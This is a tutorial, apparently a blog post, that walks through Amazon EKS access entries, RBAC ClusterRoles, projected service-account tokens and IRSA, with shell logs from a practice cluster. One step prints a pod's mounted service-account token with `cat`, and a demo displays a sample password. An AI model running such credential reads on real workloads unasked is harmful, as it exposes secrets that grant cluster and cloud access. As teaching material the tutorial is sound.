Using EKS requires authenticating with both AWS IAM and Kubernetes RBAC, which can be cumbersome. That friction is the starting point for the simplified access management controls explored in this practice.

Obtaining an AWS token:

  • When a user issues a Kubernetes command from their local machine, the kubectl command follows the kubeconfig settings on the user’s machine and sends a request to the EKS service endpoint using the get-token command.
  • The response includes a base64-encoded token, which is a pre-signed URL.
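You can make the same call that kubectl performs under the hood to inspect the token yourself. A minimal sketch, assuming the cluster name used throughout this post (the token value will differ in your environment):

aws eks get-token --cluster-name sigridjin-ekscluster-240413-3 --output json | jq -r '.status.token'
# The response is an ExecCredential object; status.token has the form
# k8s-aws-v1.<base64url-encoded, pre-signed STS GetCallerIdentity URL>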

Authentication: kubectl → API Server

  • The kubectl command sends the bearer token along with the Kubernetes action to the API server.
  • The webhook verifies this token and performs the authentication process.
  • Token verification (authentication) is not handled by the API server itself; it is delegated through the webhook to AWS IAM/STS. Authorization still happens afterwards inside Kubernetes via RBAC.

Authentication: API Server → Webhook:

  • To enable the webhook to handle AWS IAM, the API server sends a request to the webhook, which returns the UserId and Role ARN.
  • At this point, the authentication is complete, and the AWS-Auth configuration map is used to map the authenticated user to Kubernetes users and groups for authorization.

Authentication: Webhook → AWS-Auth:

  • AWS-Auth is a configuration map that maps AWS IAM entities to Kubernetes users and groups.

Authorization

  • The API server receives the authenticated user, along with the mapped Kubernetes users and groups, and performs authorization using Kubernetes RBAC.

Step 1: Changing the EKS API access mode

  • Use the command aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API to change the EKS API access mode.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API

{
"update": {
"id": "dcd3d6ac-f464-4397-b875-fc16856053b2",
"status": "InProgress",
"type": "AccessConfigUpdate",
"params": [
{
"type": "AuthenticationMode",
"value": "\"API\""
}
],
"createdAt": "2024-04-13T19:17:42.066000+09:00",
"errors": []
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:'

NAME CREATED AT
admin 2024-04-13T02:41:20Z
cluster-admin 2024-04-13T02:41:20Z
edit 2024-04-13T02:41:20Z
view 2024-04-13T02:41:20Z

kubectl describe clusterroles admin
kubectl describe clusterroles cluster-admin
kubectl describe clusterroles edit
kubectl describe clusterroles view

Step 2: Listing supported access policies

  • Use the command aws eks list-access-policies | jq to list all access policies supported for managing cluster access.
  • The supported policies include AmazonEKSClusterAdminPolicy, AmazonEKSAdminPolicy, AmazonEKSEditPolicy, and AmazonEKSViewPolicy.

Step 3: Verifying mapped cluster roles

  • Use the command kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:' to get the cluster roles mapped to the access policies.
  • The mapped cluster roles are admin, cluster-admin, edit, and view.
  • You can use kubectl describe clusterroles followed by the role name to view the details of each cluster role.

Step 4: Listing access entries and associated access policies

  • Use the command aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq to list the access entries for the cluster.
  • Use aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn <principal-arn> | jq to list the associated access policies for a specific principal.
  • Use aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn <principal-arn> | jq to describe the details of an access entry for a specific principal.
  • Current state: the testuser on Bastion2 has no EKS access entry and no mapping in the aws-auth ConfigMap, so kubectl commands issued as that user fail.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq
{
"accessEntries": [
"arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR",
"arn:aws:iam::712218945685:root"
]
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR | jq
{
"associatedAccessPolicies": [],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR"
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR | jq
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR",
"kubernetesGroups": [
"system:nodes"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/role/712218945685/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/86c76aae-3ac0-4c57-2e79-ece0c5fcef3e",
"createdAt": "2024-04-13T11:49:50.320000+09:00",
"modifiedAt": "2024-04-13T11:49:50.320000+09:00",
"tags": {},
"username": "system:node:{{EC2PrivateDNSName}}",
"type": "EC2_LINUX"
}
}

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get node -v6
I0413 19:24:49.801508 3958 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0413 19:24:49.801643 3958 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused
I0413 19:24:49.801682 3958 cached_discovery.go:120] skipped caching discovery info due to Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused

Step 5: Configuring access for the testuser

  • Use the command aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser to create an access entry for the testuser.
  • Use aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster to associate the AmazonEKSClusterAdminPolicy with the testuser.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser

{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/d2c76b7f-30cb-7a87-c451-d8bc2dff2cd3",
"createdAt": "2024-04-13T19:26:19.272000+09:00",
"modifiedAt": "2024-04-13T19:26:19.272000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]

arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
arn:aws:iam::712218945685:root
arn:aws:iam::712218945685:user/testuser

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser \
> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster

{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"associatedAccessPolicy": {
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T19:26:39.888000+09:00",
"modifiedAt": "2024-04-13T19:26:39.888000+09:00"
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq

{
"associatedAccessPolicies": [
{
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T19:26:39.888000+09:00",
"modifiedAt": "2024-04-13T19:26:39.888000+09:00"
}
],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser"
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq

{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/d2c76b7f-30cb-7a87-c451-d8bc2dff2cd3",
"createdAt": "2024-04-13T19:26:19.272000+09:00",
"modifiedAt": "2024-04-13T19:26:19.272000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

Step 6: Verifying access for the testuser

  • On the [myeks-bastion-2] instance, verify the testuser’s identity using aws sts get-caller-identity --query Arn and kubectl whoami.
  • Test kubectl commands like kubectl get node -v6, kubectl api-resources -v5, kubectl rbac-tool whoami, and kubectl auth can-i delete pods --all-namespaces.
  • Check the aws-auth ConfigMap and IAM identity mapping using kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh and eksctl get iamidentitymapping --cluster $CLUSTER_NAME.
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl whoami
arn:aws:iam::712218945685:user/testuser

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get pod -v6
I0413 19:31:28.779548 4855 loader.go:395] Config loaded from file: /root/.kube/config
I0413 19:31:29.664412 4855 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 872 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 80m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 80m

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh

apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
[]
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes

Step 7: Deleting the testuser access entry

  • Use the command aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser to delete the access entry for the testuser.
  • Verify the removal using aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[].
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#

Step 8: Verifying that the testuser's access has been revoked

After deleting the testuser's access entry, confirm that the testuser can no longer reach the cluster: every kubectl operation should now fail with an "Unauthorized" error. This proves that deleting the access entry took effect and the testuser's permissions have been revoked.

aws sts get-caller-identity --query Arn
kubectl whoami

kubectl get pod -v6
kubectl api-resources -v5
kubectl auth can-i get pods --all-namespaces
kubectl auth can-i delete pods --all-namespaces
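If the access entry was deleted correctly, every one of these commands should now fail during authentication. The exact wording depends on the kubectl version, but the error should look roughly like this:

kubectl get node -v6
# ...
# error: You must be logged in to the server (Unauthorized)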

Step 9: Creating custom ClusterRoles & ClusterRoleBindings and associating Kubernetes groups

#
cat <<EoF> ~/pod-viewer-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: pod-viewer-role
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
EoF

cat <<EoF> ~/pod-admin-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: pod-admin-role
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["*"]
EoF

kubectl apply -f ~/pod-viewer-role.yaml
kubectl apply -f ~/pod-admin-role.yaml
kubectl create clusterrolebinding viewer-role-binding --clusterrole=pod-viewer-role --group=pod-viewer
kubectl create clusterrolebinding admin-role-binding --clusterrole=pod-admin-role --group=pod-admin

# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:37:55.582000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser

{
"associatedAccessPolicies": [],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser"
}

# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:37:55.582000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

# Apply the kubernetesGroups update (switch the group to pod-admin)
# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-admin | jq -r .accessEntry
{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:39:32.125000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}

We create two custom ClusterRoles: “pod-viewer-role” and “pod-admin-role”. The “pod-viewer-role” grants permissions to list, get, and watch pods, while the “pod-admin-role” grants full permissions (all verbs) on pods. By creating these ClusterRoles, we define the desired permissions that we want to assign to the testuser later. This step prepares the necessary roles for testing different access levels.

Then we create ClusterRoleBindings to associate the custom ClusterRoles with Kubernetes groups. The “viewer-role-binding” binds the “pod-viewer-role” to the “pod-viewer” group, and the “admin-role-binding” binds the “pod-admin-role” to the “pod-admin” group. By creating these bindings, we establish a connection between the roles and the groups. Additionally, we create an access entry for the testuser and assign them to the “pod-viewer” group using the aws eks create-access-entry command. This step sets up the necessary bindings and assigns the testuser to the desired group for testing their permissions.
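Before switching to the testuser, a cluster admin can sanity-check the bindings with RBAC impersonation; a quick sketch using the testuser ARN from this post:

kubectl auth can-i list pods --as "arn:aws:iam::712218945685:user/testuser" --as-group "pod-viewer"   # expected: yes
kubectl auth can-i delete pods --as "arn:aws:iam::712218945685:user/testuser" --as-group "pod-viewer" # expected: no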

Step 10. Verifying testuser’s access with the assigned Kubernetes group

# Check the testuser's identity
aws sts get-caller-identity --query Arn
kubectl whoami

# Try kubectl commands
kubectl get pod -v6
kubectl api-resources -v5
kubectl auth can-i get pods --all-namespaces
kubectl auth can-i delete pods --all-namespaces
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser
Updated context testuser in /root/.kube/config
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get pod -v6
I0413 19:39:48.672663 5809 loader.go:395] Config loaded from file: /root/.kube/config
I0413 19:39:49.507306 5809 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 827 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 89m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 89m

After assigning the testuser to the “pod-viewer” group, we want to verify their access permissions. By running these commands, we check if the testuser can perform actions allowed by the “pod-viewer-role”, such as getting pods, but cannot perform actions like deleting pods. This step ensures that the testuser’s permissions are correctly enforced based on the assigned Kubernetes group.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer | jq -r .accessEntry
{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:41:46.616000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
# kubectl delete pod awscli-pod-5bdb44b5bd-cmddg
Error from server (Forbidden): pods "awscli-pod-5bdb44b5bd-cmddg" is forbidden: User "arn:aws:iam::712218945685:user/testuser" cannot delete resource "pods" in API group "" in the namespace "defau

When the testuser's Kubernetes group is instead set to "pod-admin", rerunning the same commands verifies the broader access level: the testuser can then perform every action allowed by the "pod-admin-role", including deleting pods. This confirms that the testuser's effective permissions follow the Kubernetes group assigned to the access entry.

EKS IRSA (IAM Roles for Service Accounts) and Pod Identity

  • IRSA is a way to grant permissions to individual pods in an EKS cluster. Before IRSA, there was a problem with the process of granting permissions to pods.
  • Worker nodes in EKS have an IAM policy attached to them, which means if a single pod on a worker node is compromised, it can access all the permissions granted to the worker node. This violates the principle of least privilege and poses a security risk. IRSA solves this problem by allowing you to assign specific permissions to specific pods, minimizing the risk of unauthorized access.
  • When a Kubernetes pod wants to use an AWS service, it authenticates and gets authorized through AWS STS and IAM, using an IAM OIDC Identity Provider associated with the EKS cluster. This allows you to connect specific pods with specific permissions, enabling them to use specific AWS services.
  • Service Account Token Volume Projection: Instead of using secret-based volumes for service account tokens, IRSA uses projected volumes.
  • Admission Control: Kubernetes admission controllers intercept and modify or validate requests before they are persisted in the cluster.
  • JWT (JSON Web Token): A compact, URL-safe means of representing claims to be transferred between two parties.
  • OIDC (OpenID Connect): An authentication layer on top of OAuth 2.0, which allows clients to verify the identity of an end-user based on the authentication performed by an authorization server.

Service Account Token Volume Projection Link

  • Legacy secret-based service account tokens are a poor fit for authenticating to other services because they lack attributes such as an audience and an expiration time.
  • Service Account Token Volume Projection solves this by allowing you to specify token attributes in the pod specification.
  • The service account admission controller adds a projected volume instead of a secret-based volume for non-expiring service account tokens created by the token controller.
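For reference, requesting a token with explicit attributes looks roughly like this in a pod spec (a sketch adapted from the upstream Kubernetes example; the audience value is only an illustration):

apiVersion: v1
kind: Pod
metadata:
  name: sa-token-projection-demo   # hypothetical name, for illustration only
spec:
  serviceAccountName: default
  containers:
  - name: app
    image: busybox:1.28
    args: ["sleep", "3600"]
    volumeMounts:
    - name: projected-token
      mountPath: /var/run/secrets/tokens
  volumes:
  - name: projected-token
    projected:
      sources:
      - serviceAccountToken:
          audience: vault            # illustrative audience for the token
          expirationSeconds: 7200    # kubelet rotates the token before it expires
          path: vault-token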

Bound Service Account Token Volume Link

  • ServiceAccountToken: Obtained from the TokenRequest API of the kube-apiserver, valid for 1 hour or until the pod is deleted.
  • ConfigMap: Contains the CA bundle used to verify the connection to the kube-apiserver.
  • DownwardAPI: References the namespace of the pod.
apiVersion: v1
kind: Pod
metadata:
  name: test-projected-volume
spec:
  containers:
  - name: test-projected-volume
    image: busybox:1.28
    args:
    - sleep
    - "86400"
    volumeMounts:
    - name: all-in-one
      mountPath: "/projected-volume"
      readOnly: true
  volumes:
  - name: all-in-one
    projected:
      sources:
      - secret:
          name: user
      - secret:
          name: pass
# Create the Secrets
echo -n "admin" > ./username.txt
echo -n "1f2d1e2e67df" > ./password.txt

## Package these files into secrets:
kubectl create secret generic user --from-file=./username.txt
kubectl create secret generic pass --from-file=./password.txt

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl apply -f https://k8s.io/examples/pods/storage/projected.yaml

pod/test-projected-volume created
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod test-projected-volume -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: test-projected-volume
namespace: default
spec:
containers:
- args:
- sleep
- "86400"
image: busybox:1.28
name: test-projected-volume
volumeMounts:
- mountPath: /projected-volume
name: all-in-one
readOnly: true
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-c5fnf
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
serviceAccountName: default
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
- name: kube-api-access-c5fnf
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace

Configuring a Pod to Use a Projected Volume for Storage Link

  • You can use a projected volume to mount several existing volume sources (secret, configMap, downwardAPI, serviceAccountToken) into the same directory. This allows you to consolidate multiple volume sources into a single directory for easier access.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it test-projected-volume
error: you must specify at least one command for the container
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it test-projected-volume -- /bin/sh
/ # ls
bin home root usr
dev proc sys var
etc projected-volume tmp
/ # cd projected-volume
/projected-volume # ls
password.txt username.txt
/projected-volume # cat username.txt
admin/projected-volume # cat password.txt
1f2d1e2e67df/projected-volume #

Kubernetes API access flow

https://kubernetes.io/blog/2019/03/21/a-guide-to-kubernetes-admission-controllers/
  • Authentication (AuthN) → Authorization (AuthZ) → Admission Control
  • Admission Control consists of Mutating Webhooks and Validating Webhooks
  • Mutating Webhooks allow administrators to modify user requests.
  • Validating Webhooks allow administrators to deny user requests.
  • Users can implement their own Admission Controllers using Dynamic Admission Controllers.
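For reference, a dynamic admission webhook is registered with a MutatingWebhookConfiguration or ValidatingWebhookConfiguration object. A minimal validating sketch (the webhook name, Service name, and namespace are placeholders for illustration):

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: demo-validating-webhook            # hypothetical name
webhooks:
- name: pods.demo.example.com
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Fail
  clientConfig:
    service:
      name: demo-webhook-svc                # hypothetical Service fronting the webhook server
      namespace: default
      path: /validate
    caBundle: <base64-encoded-CA>           # CA used to verify the webhook's TLS certificate
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]

The EKS cluster already ships with several webhook configurations of its own, as listed below.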
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get validatingwebhookconfigurations

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h35m
eks-aws-auth-configmap-validation-webhook 1 8h
kube-prometheus-stack-admission 1 7h46m
vpc-resource-validating-webhook 2 8h
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h35m
kube-prometheus-stack-admission 1 7h46m
pod-identity-webhook 1 8h
vpc-resource-mutating-webhook 1 8h

Introduction to IRSA

IRSA allows pods to assume specific IAM roles by sending a token to AWS. AWS then verifies if the pod can use the IAM role based on the token and the EKS Identity Provider (IdP). Instead of mapping roles to nodes, IRSA enables mapping roles directly to pods.
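The pod-to-role mapping is enforced by the IAM role's trust policy, which names the cluster's OIDC provider and pins the token's sub (and ideally aud) claims to a single service account. Roughly, the trust policy that eksctl generates for the my-sa example later in this section looks like the following (account ID, region, and OIDC ID are placeholders):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::<ACCOUNT_ID>:oidc-provider/oidc.eks.<REGION>.amazonaws.com/id/<OIDC_ID>"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.<REGION>.amazonaws.com/id/<OIDC_ID>:sub": "system:serviceaccount:default:my-sa",
          "oidc.eks.<REGION>.amazonaws.com/id/<OIDC_ID>:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}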

Practice 1: Creating a Pod without a Service Account Token

  1. Create a pod without explicitly setting a Service Account (SA). The default SA will be used.
  2. The pod, once running, executes the s3 ls command.
  3. However, the command fails with an access error, because the pod has been granted no IAM permissions of its own; with automountServiceAccountToken: false, not even a service account token is mounted.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: eks-iam-test1
spec:
  containers:
  - name: my-aws-cli
    image: amazon/aws-cli:latest
    args: ['s3', 'ls']
  restartPolicy: Never
  automountServiceAccountToken: false
  terminationGracePeriodSeconds: 0
EOF

kubectl get pod
kubectl describe pod

kubectl logs eks-iam-test1

kubectl delete pod eks-iam-test1

Practice 2: Creating a Pod with a Service Account Token

  1. Create a pod named “eks-iam-test2” using the provided YAML configuration.
  2. Verify the pod’s details using kubectl get pod, kubectl describe pod, and kubectl get pod eks-iam-test2 -o yaml.
  3. Check the mounted Service Account token by executing kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount and kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  4. Attempt to use an AWS service by running kubectl exec -it eks-iam-test2 -- aws s3 ls, which will fail due to insufficient permissions.
